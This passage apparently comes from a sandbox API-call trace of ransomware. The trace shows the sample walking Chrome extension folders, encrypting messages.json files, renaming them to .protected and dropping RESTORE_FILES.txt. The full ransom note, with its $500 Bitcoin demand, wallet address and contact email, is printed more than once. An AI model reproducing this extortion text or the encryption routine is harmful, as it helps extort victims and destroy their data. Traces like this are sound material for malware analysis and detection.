(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.124] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.124] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.124] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.124] CloseHandle (hObject=0x164) returned 1 [0081.124] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.124] lstrcmpiW (lpString1="nb", lpString2="Windows") returned -1 [0081.124] lstrcmpiW (lpString1="nb", lpString2="Program Files") returned -1 [0081.124] lstrcmpiW (lpString1="nb", lpString2="Program Files (x86)") returned -1 [0081.124] lstrcmpiW (lpString1="nb", lpString2="$Recycle.bin") returned 1 [0081.124] lstrcmpiW (lpString1="nb", lpString2="System Volume Information") returned -1 [0081.124] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb") returned 145 [0081.124] lstrcmpW (lpString1="nb", lpString2=".") returned 1 [0081.124] lstrcmpW (lpString1="nb", lpString2="..") returned 1 [0081.124] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\*") returned 147 [0081.124] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.124] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.125] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.125] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.125] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.125] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.125] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\.") returned 147 [0081.125] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.125] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.125] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.125] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.125] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.125] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.125] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.125] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\..") returned 148 [0081.125] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.125] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.125] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.125] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.125] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.125] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.125] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.125] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.125] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json") returned 159 [0081.125] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.125] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.125] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.125] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.125] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.125] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json") returned 159 [0081.125] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.125] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json") returned 159 [0081.125] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.125] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json") returned 159 [0081.125] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.126] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x284, lpOverlapped=0x0) returned 1 [0081.127] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd7c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.127] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x284, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x284, lpOverlapped=0x0) returned 1 [0081.127] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.127] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.127] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.127] CloseHandle (hObject=0x168) returned 1 [0081.127] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json.protected") returned 169 [0081.127] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json.protected")) returned 1 [0081.128] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.128] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.128] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\RESTORE_FILES.txt") returned 163 [0081.128] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.128] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.128] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.129] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.129] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.129] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.129] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.129] CloseHandle (hObject=0x164) returned 1 [0081.129] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.129] lstrcmpiW (lpString1="nl", lpString2="Windows") returned -1 [0081.129] lstrcmpiW (lpString1="nl", lpString2="Program Files") returned -1 [0081.130] lstrcmpiW (lpString1="nl", lpString2="Program Files (x86)") returned -1 [0081.130] lstrcmpiW (lpString1="nl", lpString2="$Recycle.bin") returned 1 [0081.130] lstrcmpiW (lpString1="nl", lpString2="System Volume Information") returned -1 [0081.130] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl") returned 145 [0081.130] lstrcmpW (lpString1="nl", lpString2=".") returned 1 [0081.130] lstrcmpW (lpString1="nl", lpString2="..") returned 1 [0081.130] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\*") returned 147 [0081.130] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.130] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.130] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.130] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.130] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.130] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.130] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\.") returned 147 [0081.130] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.130] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.130] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.130] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.130] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.130] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.130] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.130] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\..") returned 148 [0081.130] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.130] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.130] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.130] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.130] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.130] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.130] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.130] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.130] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json") returned 159 [0081.130] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.130] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.131] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.131] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.131] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.131] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json") returned 159 [0081.131] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.131] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json") returned 159 [0081.131] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.132] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json") returned 159 [0081.132] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.132] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x282, lpOverlapped=0x0) returned 1 [0081.133] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd7e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.133] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x282, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x282, lpOverlapped=0x0) returned 1 [0081.133] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.133] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.133] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.133] CloseHandle (hObject=0x168) returned 1 [0081.133] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json.protected") returned 169 [0081.133] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json.protected")) returned 1 [0081.134] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.134] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.134] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\RESTORE_FILES.txt") returned 163 [0081.134] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.134] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.134] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.135] lstrlenA 